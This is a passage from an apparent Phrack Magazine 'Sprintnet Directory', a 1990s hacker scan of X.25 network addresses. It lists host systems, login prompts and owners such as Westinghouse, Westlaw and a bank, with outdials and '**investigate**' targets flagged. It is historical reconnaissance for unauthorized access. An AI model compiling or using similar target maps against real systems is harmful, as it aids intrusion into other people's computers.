- 422 181 WESTINGHOUSE SNA NETWORK - ENTER: L APPLNAME
- 422 183 MHP1201I TERMINAL CONNECTED TO PACKET/74
- 422 184 MHP1201I TERMINAL CONNECTED TO PACKET/74
- 422 185 MHP1201I TERMINAL CONNECTED TO PACKET/74
- 422 187 MHP1201I TERMINAL CONNECTED TO PACKET/74
- 422 237
- 422 240
- 422 244 WESPAC/ENTER PASSWORD
- 422 252
- 422 254.6 Westinghouse X.25 Network / Tech Control 422254
- 422 254.8 (drops to dos?)
- 422 255 VM/??? WESCO INFORMATION SYSTEMS
- 422 310 VAX/VMS
- 422 311
- 422 340
- 422 346
- 422 365
- 422 375
- 422 376 AOS Westinghouse Corporate Information Services
- 422 381 TACL 1>
- 422 390
- 422 401 AOS
- 422 405 AOS
- 422 409 AOS
- 422 410 AOS
- 422 412 AOS
- 422 413 AOS
- 422 416 AOS
- 422 424 AOS
- 422 431 AOS
- 422 440 AOS
- 422 443 AOS
- 422 450.2 RM >
- 422 450.3 CDS >
- 422 450.4 CDS >
- 422 450.5 (beep!)
- 422 450.6 CDS >
- 422 450.7 CDS >
- 422 450.8 RM >
- 422 450.9 CDS >
- 422 450.10 CDS >
- 422 450.11 CDS >
- 422 454
- 422 493 AOS
- 422 494 Westinghouse ESCC IBM C-80 System B Access
- 422 495 Westinghouse ESCC IBM C-80 System B Access
- 422 496 Westinghouse ESCC IBM C-80 System B Access
- 422 497 Westinghouse ESCC IBM C-80 System A Access
- 422 501 AOS
- 422 502 TSO pci protocol converter please logon pad 502
- 422 504.9 ESCC CCU PAD 504 - PLEASE ENTER PASSWORD
- 422 508 Westinghouse Power Generation World Headquarters
- 422 511 AOS
- 422 514 AOS
- 422 517 AOS
- 422 519 Westinghouse X.25 Network Lima, OH pad 422519
- 422 522 AOS
- 422 525 AOS
- 422 527 AOS Nuclear Saftey
- 422 535 AOS
- 422 539 AOS
- 422 541 AOS
- 422 544.2 RM >
- 422 545 AOS
- 422 547 VAX/VMS
- 422 555 AOS
- 422 558 Westinghouse X.25 Network Orrville, OH pad p558
- 422 559 AOS
- 422 571 AOS
- 422 577 AOS
- 422 609 AOS
- 422 601 Unix/SunOS
- 422 602 AOS
- 422 606 Carpenter Technology's Network
- 422 608 AOS
- 422 609 AOS
- 422 613 AOS
- 422 614
- 422 616 AOS
- 422 623 AOS
- 422 631 AOS
- 422 636 Wesmark System
- 422 637 AOS
- 422 645 AOS
- 422 649 AOS
- 422 651 AOS
- 422 656 Wesmark System
- 422 657 AOS
- 422 659 AOS
- 422 660 AOS
- 422 669 AOS
- 422 674 AOS
- 422 694 IBM 7171 Access please hit the ENTER key
- 422 695 Westinghouse ESCC IBM C-80 System G Access
- 422 696 Westinghouse ESCC IBM C-80 System F Access
- 422 697 Westinghouse ESCC IBM C-80 System E Access
- 422 698 Westinghouse ESCC IBM C-80 System D Access
- 422 702 (garbage)
- 422 999 WCCS Figures Service
- 422 1200.99 Username:
- 422 1205 ****POSSIBLE DATA LOSS 00 00****
- 422 1207 password:
- 422 1208.1 Westinghouse X.25 Network BALTIMORE, MD.
- 422 1215
- 422 1305 AOS
- 422 1304.1 Westinghouse X.25 Network Ft. Payne, AL pad 1304a
- 422 1305 AOS
- 422 1312.1 Westinghouse X.25 Network Winston-Salem, NC pad 1312-1
- 422 1317 AOS
- 422 1319
- 422 1320 AOS
- 422 1322 AOS
- 422 1396 VAX/VMS
- 422 1398 VAX/VMS
- 422 1405
- 422 1420 VAX/VMS COFVIL - APTUS Coffeyville system
- 422 1512 Please enter service name > (use 'wespac')
- 422 1720
- 422 1719
- 422 1720
- 422 1722 (menu driven...)
- 422 1724
- 422 1759 (menu driven...)
- 422 1760
- 422 1791
- 422 1792
- 422 1793
- 422 1794
- 422 1840.2 Prime Primecom Network 19.4Q.111 System 47
- 422 1852 Knutsford PAD 1
- 422 1855 Stansted Delta PAD Operator:
- 422 1860.1
- 422 1862
- 422 1884.1 >
- 422 1890.1 London, UK PAD 4221890
- 422 1901.2 $ Westinghouse EURO.SWITCH.NETWORK - WNI -BRUSSEL
- 422 1907 $ WESPAC PAD 4
- 422 1917 $ WESPAC PAD 3
- 422 3101.1 Class of Service:
- 422 3201 AOS
- 422 3202 AOS
- 422 3203 AOS
- 422 3204 AOS
- 422 3208
- 422 3209
- 422 3210
- 422 3211
- 422 3212
- 422 3213 AOS
- 422 3214 SmartView NetWork Management System
- 422 3219 AOS
- 422 3221 AOS
- 422 3222
- 422 3223
- 422 3228 AOS
- 422 3230
- 422 3231
- 422 3233.1
- 422 3234
- 422 3235 AOS
- 422 3236 VISTA BATCH User ID?
- 422 3252 AOS
- 422 3253 AOS
- 422 3254 AOS
- 422 3255 AOS
- 422 3258
- 422 3259
- 422 3260
- 422 3261
- 422 3361
- 422 3362
- 422 3363
- 422 3401 TSO MIS Computer Centre
- 422 3403 Port Select MIS Computer Center
- 422 3503 VAX/VMS
- 422 3601 Westinghouse X.25 Network O' Hara Site pad 4223601
- 422 3602 VAX/VMS
- 422 3701 VAX/VMS
- 422 3703 CDCNET 2 systems: SN211=CRAY, NOSF=Cyber
- 422 3704 CDCNET
- 422 3705 CDCNET
- 422 3753
- 422 3804
- 422 3805
- 422 3806
- 422 3807
- 422 3842.1 Jones Day Washington Office
- 422 3860.2 Jones Day Pittsburgh Office
- 422 3902 enter class
- 422 3904 VAX/VMS
- 422 5021
- 422 5039
- 422 5037 connected 31104220503700/
- 422 5043
- 422 5044
- 422 5052 VAX/VMS
- 422 5053 VAX/VMS
- 422 5060
- 422 5082
- 422 6002
- 422 6011
-
- 501 - Arkansas Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 501 130 *
- 501 131 *
- 501 133
-
-
-
-
- 502 - Kentucky Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 502 74 VAX/VMS Username:
- 502 75 VAX/VMS Username:
- 502 130 ??? B&W Corporate Computer System
- 502 136 CONNECTED TO PACKET/94
- 502 138 *
-
-
-
-
- 503 - Oregon Scanned: [0 - 500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 503 20 $ outdial (503)
- 503 21 $ outdial (503)
- 503 33 Major BBS Public Data Network User-ID? new
- 503 120 $ outdial (503)
- 503 378 *
- 503 379 *
- 503 476 $ access barred
- 503 477 *
- 503 530 *
- 503 531 *
-
-
-
-
- 505 - New Mexico Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 505 30
- 505 153 *
- 505 157 *
- 505 159 *
- 505 233 $ REQUESTED APPLICATION NOT DEFINED
-
-
-
-
- 509 - Washington Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 509 232 $
-
-
-
-
- 512 - Texas Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 512 8 $ outdial (512)
- 512 55 *
- 512 63 *
- 512 65 *
- 512 136 AL /,/- (locks up)
- 512 138 *
- 512 140 AL /,/- (locks up)
- 512 151 *
- 512 152 *
- 512 153 *
- 512 253 *
- 512 257 Unix HP-UX ioi877
- 512 260 *
- 512 330
- 512 331
-
-
-
-
- 513 - Ohio Scanned: [0 - 300+]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 513 30 Lexis and Nexis
- 513 31 Port Selec MEADNET (hosts:lexis,tymnet,telenet,dialcom...)
- 513 32 $ $$ 5800 LOGIN SUCCESSFUL
- 513 37 $ Prime PRIMENET 23.3.0.r29 E03
- 513 55 $ Prime PRIMENET 22.1.4.R30 I01
- 513 57 $ Prime PRIMENET 23.3.0.r29 E04
- 513 58 $ VAX/VMS AEE040 is a MicroVAX 3900
- 513 66 *
- 513 67 $ Prime PRIMENET 23.3.0.r29 E01
- 513 68 *
- 513 69 *
- 513 72 $ Prime PRIMENET 22.1.4.R30 O1
- 513 73 $ Prime PRIMENET 22.1.4.R30 S2
- 513 75 $ Prime PRIMENET 22.1.4.R30 T01
- 513 77 $ Prime PRIMENET 23.3.0.r29 M01
- 513 78 $ Prime PRIMENET 22.1.4.R7 A02
- 513 79 $ Prime PRIMENET 22.1.4.R30 C2
- 513 80 Welcome To Develnet --CL2-- Request:
- 513 131 Lexis and Nexis
- 513 132 Lexis and Nexis
- 513 133 Lexis and Nexis
- 513 134 Lexis and Nexis
- 513 139 Lexis and Nexis (passthru 202365)
- 513 161 VAX/VMS AEE101
- 513 165 VAX/VMS AEE010
- 513 174 *
- 513 176 *
- 513 230 VAX/VMS Unison/Applied Software Designs, Inc.
- 513 234 $ VAX/VMS Continental PET Technologies, FLORENCE
- 513 236 *
- 513 240 *
-
-
-
-
- 515 - Iowa Scanned: [0 - 200]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 515 30 Lexis and Nexis
- 515 31 Lexis and Nexis
- 515 47 *
-
-
-
-
- 516 - New York Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 516 14 $ outdial (516)
- 516 15 $ outdial (516)
- 516 35 CCI Multilink Services, (mail)
- 516 38 *
- 516 45 Hello
- 516 48.1 CUSTOMER ID:
- 516 49.1 CUSTOMER ID:
- 516 140 *
- 516 234 *
-
-
-
-
- 518 - New York Scanned:[0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 518 30 MHP201A UPK12X01 APPLICATION:
- 518 36 MHP201A UPK12X01 APPLICATION:
- 518 230 MHP201A UPK12X01 APPLICATION:
- 518 231 MHP201A UPK12X01 APPLICATION:
-
-
-
- ==Phrack Magazine==
-
- Volume Four, Issue Forty-Two, File 10 of 14
-
- <Sprintnet Directory Part 3>
-
-
- 602 - Arizona Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 602 22 $ outdial?
- 602 23 $ outdial?
- 602 26 $ outdial (602)
- 602 35 $ MSG 1: COMMAND INVALID FROM PHTIB010
- 602 145 $ PSI Please enter our X.29 Password:
- 602 148 *
- 602 155.2 VAX/VMS This is DTAC02 - VAX/VMS V5.5
- 602 165 *
- 602 166
- 602 167 *
-
-
-
-
- 603 - New Hampshire Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 603 20 $ Dartmouth College Time Sharing, D1
- 603 31 $ outdial
- 603 40 $ DTC01, IP 130.010.200.023
- 603 46 USER NUMBER--
- 603 47 *
- 603 60 VAX/VMS
- 603 61 **** Invalid sign-on, please try again ****
- 603 62 **** Invalid sign-on, please try again ****
- 603 63 **** Invalid sign-on, please try again ****
- 603 68
- 603 135 VM/CMS ENTERPRISE SYSTEMS ARCHITECTURE--ESA370
- 603 136 VM/CMS ENTERPRISE SYSTEMS ARCHITECTURE--ESA370
- 603 142 *
-
-
-
-
- 609 - New Jersey Scanned: [0 - 500]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 609 41 WHAT SERVICE PLEASE????
- 609 42 WHAT SERVICE PLEASE????
- 609 46 WHAT SERVICE PLEASE????
- 609 73 $ DTC DTC01.DOMAIN.ORGANIZATION
- 609 100 Prime
- 609 120 Prime
- 609 135 *
- 609 138 Prime PRIMENET 23.0.0 HCIONE
- 609 170 Prime
- 609 232 *
- 609 235 VAX/VMS TMA Information Services
- 609 238 *
- 609 239 *
- 609 242 WHAT SERVICE PLEASE????
- 609 243 WHAT SERVICE PLEASE????
- 609 244 WHAT SERVICE PLEASE????
- 609 245 *
- 609 246 *
- 609 247 *
- 609 259
-
-
-
-
- 611 - unknown Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 611 20
- 611 21
- 611 25 ? (Transend?)
- 611 26 ?
- 611 27 ?
- 611 28 ?
- 611 50 SYSTEM AVAILABLE FOR YOUR USE
- 611 55 SYSTEM AVAILABLE FOR YOUR USE
- 611 90 VAX/VMS Username:
- 611 120 VAX/VMS Username:
- 611 192 Prime
- 611 193 Prime
- 611 194 Prime
- 611 195 Prime
- 611 230 VAX/VMS
- 611 231 VAX/VMS
- 611 232 VAX/VMS
- 611 233 VAX/VMS
- 611 234 AOS MHCOMET System A
- 611 235 AOS MHCOMET System B
- 611 236 AOS MHCOMET System C
- 611 238 AOS MHCOMET System D
-
-
-
-
- 612 - Minnesota Scanned: [0 - 1000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 612 22 $
- 612 23 Westlaw
- 612 37 Westlaw
- 612 52 $ Prime C>
- 612 56 Westlaw
- 612 57 Westlaw
- 612 58 Westlaw
- 612 78 *
- 612 79 *
- 612 120 *
- 612 121 *
- 612 134 *
- 612 135 *
- 612 138 *
- 612 158 Westlaw
- 612 171 *
- 612 236
- 612 240 GS/1 MSC X.25 Gateway
- 612 241 *
- 612 259 VAX/VMS System LPCOMB - VAX/VMS V5.5-1
- 612 260 $ CDCNET Control Data Arden Hills CDCNET Network **investigate**
- 612 270 Westlaw
- 612 271 Westlaw
- 612 272 Westlaw
- 612 273 Westlaw
- 612 277 Password >
- 612 279 Westlaw
- 612 353 ENTER ID (Westlaw)
- 612 362 Westlaw
- 612 363 Westlaw
- 612 364 Westlaw
- 612 365 Westlaw
- 612 366 Westlaw
- 612 367 Westlaw
- 612 368 Westlaw
- 612 369 Westlaw
- 612 385 Westlaw
- 612 391 Westlaw
- 612 393 Westlaw
- 612 395 Westlaw
- 612 395 Westlaw
- 612 455 *
- 612 456
- 612 457 *
- 612 458 *
- 612 460 *
- 612 461 *
- 612 462 *
- 612 1030 *
-
-
-
-
- 614 - Ohio Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 614 21 STN International! Enter x:
- 614 22 $ outdial (614)
- 614 23 $ outdial (614)
- 614 31 STN International! Enter x:
- 614 32 STN International! Enter x:
- 614 34 STN International! Enter x:
- 614 36 *
- 614 65 Unix all attempts monitored and reported
- 614 140 STN International! Enter x:
- 614 145
- 614 148A
- 614 150A MHP201A LPKMN001 APPLICATION:
- 614 154A
- 614 155 User name?
- 614 156 CONNECTED TO PACKET/94
- 614 157 *
- 614 230 Port Selec? **investigate**
-
-
-
-
- 617 - Massachusetts Scanned: 0 - 1500
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 617 20 Prime PRIMENET 23.3.0.R20 PBN27
- 617 22 Prime PRIMENET 22.0.0vA BDSD
- 617 26 $ outdial (617)
- 617 37 Prime PRIMENET 23.3.0.R20 BDSH
- 617 47 $ ENTER ACCESS PASSWORD:
- 617 48 VAX/VMS Username:
- 617 52 VAX/VMS Username:
- 617 56 $ BEDPS:SCCHRV
- 617 63 VM/CMS IRI
- 617 66 Prime PRIMENET 23.3.0.R20 BDSK
- 617 72 Prime IRI System 2
- 617 74 Prime PRIMENET 23.3.0 ENB
- 617 78 *
- 617 114 $ Prime PRIMENET 23.2.0.R48 MD.B
- 617 115 *
- 617 136 $ DTC DTCX25.BOS.WMC
- 617 147 *
- 617 149 VAX/VMS Newton Headend Node MicroVAX (NWTNH2)
- 617 158 Prime PRIMENET 23.2.0 BDSW
- 617 169 Prime PRIMENET 22.0.0vA PBN36
- 617 178 Enter Application Request
- 617 226 VM/CMS
- 617 230 *
- 617 234 Unix? b1cs3!Username:
- 617 235 VAX/VMS Username:
- 617 236 VAX/VMS Username:
- 617 237 Unix? b1cs3!Username:
- 617 250 ND X.29 Server - Press 'ESCAPE' to log in
- 617 255 Prime PRIMENET 22.0.3vA PBN43
- 617 257 $ HP-3000
- 617 270 $ VAX/VMS COSMOS (CO6408)
- 617 274 *
- 617 279 Unix SysV oa1cs1!x25 name:
- 617 304 Prime PRIMENET 23.3.0.R20 PBN67
- 617 306 Prime PRIMENET 23.2.0 PBN53
- 617 308 Prime PRIMENET 23.3.0.R20 PBN71
- 617 311 $ outdial (617)
- 617 313 $ outdial (617)
- 617 339 *
- 617 340 VAX/VMS FAXON
- 617 341 Password:
- 617 346 VOS STRATUS CUSTOMER ASSISTANCE CENTER
- 617 348 *
- 617 350 Prime PRIMENET 23.2.0 PBN39
- 617 351 Prime PRIMENET 22.0.0vA BDSU
- 617 373 VAX/VMS FAXON
- 617 379 ??? $$ 4200 MODEL:
- 617 380 Prime PRIMENET 22.1.4.R7 L01
- 617 381 Prime PRIMENET 22.1.4.R7 P01
- 617 382 Prime PRIMENET 22.1.4.R7 Y01
- 617 383 Prime PRIMENET 22.1.4.R30 H02
- 617 384 Prime PRIMENET 22.1.4.R7 V01
- 617 385 Prime PRIMENET 22.1.4.R30 R01
- 617 387 Prime PRIMENET 22.1.2.R22 B01
- 617 388 ??? $$ 4200 MODEL:
- 617 392 Prime PRIMENET 22.1.4.R30 R04
- 617 393 Prime PRIMENET 22.1.4.R7 Y04
- 617 397 U#=
- 617 453 Prime PRIMENET 22.0.3vA PBN35
- 617 454 Prime PRIMENET 23.2.0 NORTON
- 617 455 Prime PRIMENET 23.3.r29.wg NER
- 617 457 Prime PRIMENET 23.3.0 NNEB
- 617 458 Prime PRIMENET 23.2.0.R32 CENTNE
- 617 460 *
- 617 474 Prime PRIMENET 22.1.4 MD.FL1
- 617 490 Prime PRIMENET 23.3.0 ALBANY
- 617 491 Prime PRIMENET 23.2.0 CS
- 617 492 Prime PRIMENET 23.0.0 FRMDLE
- 617 493 Prime PRIMENET 23.0.0 STMFRD
- 617 498 Prime PRIMENET 23.2.0 CS2NYC
- 617 499 Prime PRIMENET 23.2.0.R32 SYRA
- 617 502 Prime PRIMENET 23.2.0 APPLE
- 617 516 Prime PRIMENET 23.2.0.R39 PBN38
- 617 518 Prime PRIMENET 23.2.0 PBN41
- 617 519 Prime PRIMENET 23.2.0.R39 PBN54
- 617 521 Prime PRIMENET 22.0.3vA BDSG
- 617 530 ??? Maxlink International
- 617 534 dynapac: multi-pad.25
- 617 541 Prime PRIMENET 22.0.3vA BDSS
- 617 543 Prime PRIMENET 22.0.3vA PBN33
- 617 551 Prime PRIMENET 22.0.4.R7 CSP-A
- 617 553 Prime PRIMENET 22.0.3vA BDSQ
- 617 555 Prime PRIMENET 23.2.0 PBN72
- 617 558 Prime PRIMENET 23.2.0.CSBETA2 CSSS.A
- 617 560 Prime PRIMENET 23.3.0.R20 BDSN
- 617 562 Prime PRIMENET 22.1.4 BDSZ
- 617 563 Prime LOGIN PLEASE (1)
- 617 564 Prime PRIMENET 22.0.3 MD.NE
- 617 575 Prime PRIMENET 22.1.2 MF.NP1
- 617 576 Prime PRIMENET 22.0.1 B09
- 617 577 Prime PRIMENET 22.1.1.R11 B30
- 617 578 Prime PRIMENET 23.2.0.R3 SDSYSA
- 617 583 Prime PRIMENET 22.0.2 MD.HFD
- 617 585 Prime PRIMENET 23.2.0.R32 EDWIN
- 617 586 Prime PRIMENET 23.2.0 BOSMET
- 617 588 *
- 617 589 *
- 617 590 *
- 617 593 Prime PRIMENET 23.3.Beta2 BDSO
- 617 597 Prime PRIMENET 22.0.3vA BDSB
- 617 641 AOS Timeplace Inc.
- 617 649 PaperChase
- 617 654 Prime IRI System 9
- 617 710 Prime PRIMENET 23.2.0 MD.ATL
- 617 712 Prime PRIMENET 23.3.0 PEANUT
- 617 713 Prime PRIMENET 23.3.0 PEACH
- 617 714 Prime PRIMENET 23.3.0 NASH
- 617 715 Peime PRIMENET 23.2.0 MD-BHM
- 617 717 Prime PRIMENET 23.1.0 ETHEL
- 617 719 Prime PRIMENET 22.1.1.R11 PHILLY
- 617 720 Prime PRIMENET 22.1.2 CAMPHI
- 617 723 Prime PRIMENET 23.3.0 MD.NJ
- 617 724 Prime PRIMENET 23.3.0 NYMCS
- 617 726 Prime PRIMENET 23.3.0 NJCENT
- 617 727 Prime PRIMENET 22.0.1v NJPCS
- 617 750 Prime PRIMENET 23.2.0 PBN75
- 617 752 Prime PRIMENET 23.2.0 PBN68
- 617 850 Prime PRIMENET 22.1.4 MD-CHI
- 617 852 Prime PRIMENET 23.3.0 CS-LP1
- 617 853 Prime PRIMENET 23.2.0 MD.SL1
- 617 854 Prime PRIMENET 23.2.0 MD.MKW
- 617 855 Prime PRIMENET 23.0.0 TRNGC
- 617 856 Prime PRIMENET 23.2.0 CS-CHI
- 617 857 Prime PRIMENET 22.1.0 CS-OAK
- 617 861 Prime PRIMENET 22.1.3 PTCDET
- 617 862 Prime PRIMENET 23.3.0 DRBN1
- 617 863 Prime PRIMENET 23.1.0 CSTROY
- 617 864 Prime PRIMENET 23.3.0 CS.DET
- 617 865 Prime PRIMENET 23.1.0 MD.DET
- 617 868 Prime PRIMENET 23.2.0 MD.GR
- 617 869 Prime PRIMENET 22.1.1.R11 MD.CIN
- 617 870 Prime PRIMENET 23.2.0 CS.IND
- 617 871 Prime PRIMENET 22.1.3 MD.IND
- 617 872 Prime PRIMENET 23.2.0 MD-PIT
- 617 874 Prime PRIMENET 22.1.0 PITTCS
- 617 875 Prime PRIMENET 22.1.1.r35 MD-CLE
- 617 902 Prime PRIMENET 22.1.1.R11 MD.HOU
- 617 908 Prime PRIMENET 23.2.0 WMCS
- 617 910 Prime PRIMENET 23.2.0 CSWDC
- 617 911 Prime PRIMENET 23.2.0 VIENNA
- 617 912 Prime PRIMENET 23.2.0 BALT
- 617 915 Prime PRIMENET 23.0.0 WDCRTS
- 617 916 Prime PRIMENET 23.0.0 CAP1
- 617 928 Prime PRIMENET 23.3.0 CS.HOU
- 617 930 Prime PRIMENET 23.3.0 MD.AUS
- 617 931 Prime PRIMENET 23.3.0 CS-SCR
- 617 932 Prime PRIMENET 23.2.0.SCH CS.CS
- 617 936 Prime PRIMENET 23.2.0 MD.DAL
- 617 956 Prime PRIMENET 22.1.0 RELAY
- 617 957 Prime PRIMENET 22.1.3 ZULE
- 617 958 Prime PRIMENET 23.1.0 EDOC1
- 617 962 Prime PRIMENET 23.3.0.R20 PBN49
- 617 965 Prime PRIMENET 22.0.3vA BDSE
- 617 966 Prime PRIMENET 22.0.3vA BDST
- 617 978 Unix
- 617 980 Prime PRIMENET 22.1.1.R28 WUFPAK
- 617 986
- 617 991 Prime PRIMENET 23.2.0 PBN64
- 617 995 Prime PRIMENET 23.2.0.R3 ATC54
- 617 998 Prime PRIMENET 23.0.0 TRNGB
- 617 1030 *
- 617 1031 *
- 617 1033 $ CONNECTED TO PACKET/94
- 617 1035 $ T.S.S.G
- 617 1054 $ Boston Safe Deposit and Trust Company
- 617 1055 HP-3000
- 617 1075
- 617 1099 Unix SysV X.29 Terminal Service
- 617 1202 Prime PRIMENET 22.0.2 CSPLAN
- 617 1204 Prime PRIMENET 23.2.0 PBN70
- 617 1206 Prime PRIMENET 23.2.0 PBN69
- 617 1207 Prime PRIMENET 23.2.0 PBN73
- 617 1210 Prime PRIMENET 23.2.0 PBN74
- 617 1211 Unix SysV
- 617 1231 Primetec Leasing
- 617 1235 Prime PRIMENET 23.2.0 PBN45
- 617 1260 dynapac: multi-pad.25
- 617 1261 dynapac: multi-pad.25
- 617 1262 dynapac: multi-pad.25
- 617 1263 dynapac: multi-pad.25
- 617 1264 dynapac: multi-pad.25
- 617 1266 dynapac: multi-pad.25
- 617 1267 dynapac: multi-pad.25
- 617 1300 VAX/VMS Username:
- 617 1301 VAX/VMS Username:
- 617 1302 **** Invalid sign-on, please try again ****
- 617 1303 VAX/VMS Username:
- 617 1304 **** Invalid sign-on, please try again ****
- 617 1305 **** Invalid sign-on, please try again ****
- 617 1306 **** Invalid sign-on, please try again ****
- 617 1307 **** Invalid sign-on, please try again ****
- 617 1320 VAX/VMS Username:
- 617 1321 **** Invalid sign-on, please try again ****
- 617 1322 **** Invalid sign-on, please try again ****
- 617 1323 **** Invalid sign-on, please try again ****
- 617 1324 **** Invalid sign-on, please try again ****
- 617 1331 *
- 617 1333 *
- 617 1334 *
- 617 1335 *
- 617 1336 *
- 617 1337 *
- 617 1338 *
- 617 1339 *
- 617 1340 *
- 617 1341 *
- 617 1350 *
- 617 1351 *
- 617 1355 *
- 617 1356 *
- 617 1365 VAX/VMS Username:
- 617 1368 ??? Username(First Name):
- 617 1371 VAX/VMS Username:
- 617 1379 *
- 617 1441 *
- 617 1442 *
- 617 1455 *
- 617 1456 *
-
-
-
-
- 619 - California Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 619 38
- 619 41 VM/CMS
- 619 51 *
- 619 234 $ VAX/VMS Hightower MicroVAX II (HIGHH1)
- 619 258 *
- 619 270 $ VAX/VMS Daniels Headend Node MicroVAX 3100-80 (DANLH1)
-
-
-
-
- 626 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 626 1000 $ Prime
- 626 1101 $ VAX/VMS DEV2
- 626 1110 $ VAX/VMS ANT1
- 626 1111 $ VAX/VMS ANT2
- 626 1120 $ VAX/VMS OAK1
- 626 1130 $ VAX/VMS SRA1
- 626 1131 $ VAX/VMS SRA2
- 626 1160 $ VAX/VMS SFD1
- 626 2000 $ Prime
-
-
-
-
- 669 - unknown Scanned: [various]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 669 25 $ USER ID
- 669 50 $ USER ID
- 669 75 $ USER ID
-
-
-
-
- 703 - Virginia Scanned: [0 - 300]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 703 40 VAX/VMS
- 703 41 VAX/VMS
- 703 44 AOS Project HOPE
- 703 55 *
- 703 56 *
- 703 57 SELECT A SERVICE: TSO WYLBUR CMS PCI
- 703 137 *
- 703 157 ZA60001 - COM-PLETE IS ACTIVE
- 703 160 VAX/VMS
-
-
-
-
- 708 - Illinois Scanned: [0 - 1000]
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 708 34 USER ID
- 708 50 Please enter authorized ID:
- 708 54 $ VAX/VMS Duff & Phelps Corporate VAX 8350 (CO)
- 708 66 $ CONNECTED TO PACKET/74
- 708 70 VAX/VMS System LPCOMA
- 708 133 VAX/VMS
- 708 138 *
- 708 142 Enter user name:
- 708 146 *
- 708 152 ORBIT
- 708 153 ORBIT
- 708 154 ORBIT
- 708 155 ORBIT
- 708 156 ORBIT
- 708 157.4 Orbit PAD
- 708 157.5 Maxwell Onlines' File Transfer BBS
- 708 158 ncp02> enter system id (brs)
- 708 161 CONNECTED TO PACKET/94
- 708 171 Unix/SysV FTD BBS (Flowers..)
- 708 178 Unix/SysV FTD BBS
- 708 237 Prime PRIMENET 22.1.3 DZ-CHI
- 708 240 USER ID
- 708 241 USER ID
- 708 242 USER ID
- 708 243 USER ID
- 708 244 USER ID
- 708 245 USER ID
- 708 246 USER ID
- 708 247 USER ID
- 708 248 USER ID
- 708 249 USER ID
- 708 250 USER ID
- 708 251 USER ID
- 708 252 USER ID
- 708 253 USER ID
- 708 254 USER ID
- 708 260 ORBIT
- 708 261 ncp02> enter system id (brs)
- 708 272 $ DTC 'H' or '?' for help
- 708 278 *
- 708 340 ORBIT
- 708 341 ORBIT
- 708 343 ORBIT
- 708 346 ENTER APPLID: V=VTAM, A=APPLA, B-APPLB, C=APPLC
- 708 1030 ORBIT
- 708 1031 ORBIT
- 708 1032 ORBIT
- 708 1033 ORBIT
- 708 1034 ORBIT
-
-
-
-
- 711 - unknown Scanned: various
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 711 15 Prime
-
-
-
-
- 714 - California Scanned: 0 - 300
-
- ADDRESS OS/SYSTEM PROMPT/RESPONSE/OWNER/ETC LOGIN/PW
- ---------- ----------- -------------------------------------------------
- 714 4 $ outdial (714)
- 714 23 $ outdial (714)
- 714 24 $ outdial (714)
- 714 50 Unix atma_1
- 714 55 $ HP-3000 HP957.MIS.FUJITSU
- 714 102 $ ? \
- 714 119 $ ? \ outdials? (barred to my pad)
- 714 121 $ ? /
- 714 124 $ ? /
- 714 130 $ MMSA --- ENTER APPLICATION ID :
- 714 131 Prime PRIMENET 22.1.2 CAJH
- 714 133 *
- 714 134
- 714 138 $ MMSA --- ENTER APPLICATION ID :
- 714 139 $ MMSA --- ENTER APPLICATION ID :
- 714 210 $ outdial (global)
- 714 213 $ ?
- 714 236 *
- 714 242 VM/CMS
- 714 250 *
-
-
-
-
- 716 - New York Scanned: [0 - 300]
-
